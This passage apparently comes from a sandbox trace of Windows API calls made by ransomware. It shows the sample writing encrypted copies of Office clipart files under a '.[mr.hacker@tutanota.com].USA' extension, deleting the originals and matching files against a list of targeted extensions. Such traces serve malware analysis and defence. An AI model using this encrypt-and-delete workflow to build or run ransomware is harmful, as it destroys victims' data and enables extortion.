lpNewFilePointer=0x0) returned 1 [0053.653] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0053.653] GetLastError () returned 0x0 [0053.654] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x385c, lpOverlapped=0x0) returned 1 [0053.655] WriteFile (in: hFile=0x210, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x3860, lpOverlapped=0x0) returned 1 [0053.656] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.656] WriteFile (in: hFile=0x210, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.656] SetEndOfFile (hFile=0x210) returned 1 [0053.656] CloseHandle (hObject=0x210) returned 1 [0053.657] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.657] SetEndOfFile (hFile=0x208) returned 1 [0053.657] CloseHandle (hObject=0x208) returned 1 [0053.657] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.658] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0053.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.658] lstrlenW (lpString=".doc") returned 4 [0053.658] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.658] lstrlenW (lpString=".docx") returned 5 [0053.658] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.658] lstrlenW (lpString=".pdf") returned 4 [0053.658] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.658] lstrlenW (lpString=".xls") returned 4 [0053.658] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.658] lstrlenW (lpString=".xlsx") returned 5 [0053.658] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.658] lstrlenW (lpString=".ppt") returned 4 [0053.658] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.658] lstrlenW (lpString=".zip") returned 4 [0053.658] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.658] lstrlenW (lpString=".rar") returned 4 [0053.658] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.658] lstrlenW (lpString=".bz2") returned 4 [0053.658] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.658] lstrlenW (lpString=".7z") returned 3 [0053.659] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.659] lstrlenW (lpString=".dbf") returned 4 [0053.659] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.659] lstrlenW (lpString=".1cd") returned 4 [0053.659] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.659] lstrlenW (lpString=".jpg") returned 4 [0053.659] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.659] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.659] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0053.659] GetLastError () returned 0x0 [0053.659] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1ba0, lpOverlapped=0x0) returned 1 [0053.885] WriteFile (in: hFile=0x210, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1bb0, lpOverlapped=0x0) returned 1 [0053.886] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.886] WriteFile (in: hFile=0x210, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.886] SetEndOfFile (hFile=0x210) returned 1 [0053.886] CloseHandle (hObject=0x210) returned 1 [0053.886] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.887] SetEndOfFile (hFile=0x208) returned 1 [0053.887] CloseHandle (hObject=0x208) returned 1 [0053.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0054.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0054.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0054.091] lstrlenW (lpString=".doc") returned 4 [0054.091] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.091] lstrlenW (lpString=".docx") returned 5 [0054.091] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.091] lstrlenW (lpString=".pdf") returned 4 [0054.091] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.091] lstrlenW (lpString=".xls") returned 4 [0054.091] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.091] lstrlenW (lpString=".xlsx") returned 5 [0054.091] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.091] lstrlenW (lpString=".ppt") returned 4 [0054.091] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0054.091] lstrlenW (lpString=".zip") returned 4 [0054.091] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.091] lstrlenW (lpString=".rar") returned 4 [0054.091] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.091] lstrlenW (lpString=".bz2") returned 4 [0054.091] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.091] lstrlenW (lpString=".7z") returned 3 [0054.091] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0054.091] lstrlenW (lpString=".dbf") returned 4 [0054.091] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0054.091] lstrlenW (lpString=".1cd") returned 4 [0054.091] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0054.091] lstrlenW (lpString=".jpg") returned 4 [0054.091] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.119] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.120] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.120] GetLastError () returned 0x0 [0054.120] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x83c, lpOverlapped=0x0) returned 1 [0054.121] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x840, lpOverlapped=0x0) returned 1 [0054.122] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.122] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.123] SetEndOfFile (hFile=0x208) returned 1 [0054.123] CloseHandle (hObject=0x208) returned 1 [0054.123] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.123] SetEndOfFile (hFile=0x210) returned 1 [0054.123] CloseHandle (hObject=0x210) returned 1 [0054.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0054.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0054.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0054.124] lstrlenW (lpString=".doc") returned 4 [0054.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.124] lstrlenW (lpString=".docx") returned 5 [0054.124] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.124] lstrlenW (lpString=".pdf") returned 4 [0054.124] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.124] lstrlenW (lpString=".xls") returned 4 [0054.124] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.124] lstrlenW (lpString=".xlsx") returned 5 [0054.124] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.124] lstrlenW (lpString=".ppt") returned 4 [0054.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0054.124] lstrlenW (lpString=".zip") returned 4 [0054.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.124] lstrlenW (lpString=".rar") returned 4 [0054.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.125] lstrlenW (lpString=".bz2") returned 4 [0054.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.125] lstrlenW (lpString=".7z") returned 3 [0054.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0054.125] lstrlenW (lpString=".dbf") returned 4 [0054.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0054.125] lstrlenW (lpString=".1cd") returned 4 [0054.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0054.125] lstrlenW (lpString=".jpg") returned 4 [0054.125] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.125] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.125] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.126] GetLastError () returned 0x0 [0054.126] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x928, lpOverlapped=0x0) returned 1 [0054.127] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x930, lpOverlapped=0x0) returned 1 [0054.128] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.128] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.128] SetEndOfFile (hFile=0x208) returned 1 [0054.128] CloseHandle (hObject=0x208) returned 1 [0054.128] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.128] SetEndOfFile (hFile=0x210) returned 1 [0054.129] CloseHandle (hObject=0x210) returned 1 [0054.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0054.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0054.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0054.129] lstrlenW (lpString=".doc") returned 4 [0054.129] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.130] lstrlenW (lpString=".docx") returned 5 [0054.130] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.130] lstrlenW (lpString=".pdf") returned 4 [0054.130] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.130] lstrlenW (lpString=".xls") returned 4 [0054.130] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.130] lstrlenW (lpString=".xlsx") returned 5 [0054.130] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.130] lstrlenW (lpString=".ppt") returned 4 [0054.130] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0054.130] lstrlenW (lpString=".zip") returned 4 [0054.130] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.130] lstrlenW (lpString=".rar") returned 4 [0054.130] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.130] lstrlenW (lpString=".bz2") returned 4 [0054.130] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.130] lstrlenW (lpString=".7z") returned 3 [0054.130] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0054.130] lstrlenW (lpString=".dbf") returned 4 [0054.130] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0054.130] lstrlenW (lpString=".1cd") returned 4 [0054.130] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0054.130] lstrlenW (lpString=".jpg") returned 4 [0054.130] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.131] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.131] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.131] GetLastError () returned 0x0 [0054.131] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x17ac, lpOverlapped=0x0) returned 1 [0054.133] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x17b0, lpOverlapped=0x0) returned 1 [0054.134] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.134] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.134] SetEndOfFile (hFile=0x208) returned 1 [0054.134] CloseHandle (hObject=0x208) returned 1 [0054.134] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.134] SetEndOfFile (hFile=0x210) returned 1 [0054.135] CloseHandle (hObject=0x210) returned 1 [0054.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.135] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) returned 1 [0054.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0054.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0054.135] lstrlenW (lpString=".doc") returned 4 [0054.135] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.135] lstrlenW (lpString=".docx") returned 5 [0054.135] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.135] lstrlenW (lpString=".pdf") returned 4 [0054.135] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.136] lstrlenW (lpString=".xls") returned 4 [0054.136] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.136] lstrlenW (lpString=".xlsx") returned 5 [0054.136] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.136] lstrlenW (lpString=".ppt") returned 4 [0054.136] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0054.136] lstrlenW (lpString=".zip") returned 4 [0054.136] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.136] lstrlenW (lpString=".rar") returned 4 [0054.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.136] lstrlenW (lpString=".bz2") returned 4 [0054.136] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.136] lstrlenW (lpString=".7z") returned 3 [0054.136] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0054.136] lstrlenW (lpString=".dbf") returned 4 [0054.136] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0054.136] lstrlenW (lpString=".1cd") returned 4 [0054.136] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0054.136] lstrlenW (lpString=".jpg") returned 4 [0054.136] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.136] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.137] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.137] GetLastError () returned 0x0 [0054.137] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xd58, lpOverlapped=0x0) returned 1 [0054.138] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xd60, lpOverlapped=0x0) returned 1 [0054.139] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.139] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.139] SetEndOfFile (hFile=0x208) returned 1 [0054.139] CloseHandle (hObject=0x208) returned 1 [0054.140] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.140] SetEndOfFile (hFile=0x210) returned 1 [0054.140] CloseHandle (hObject=0x210) returned 1 [0054.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 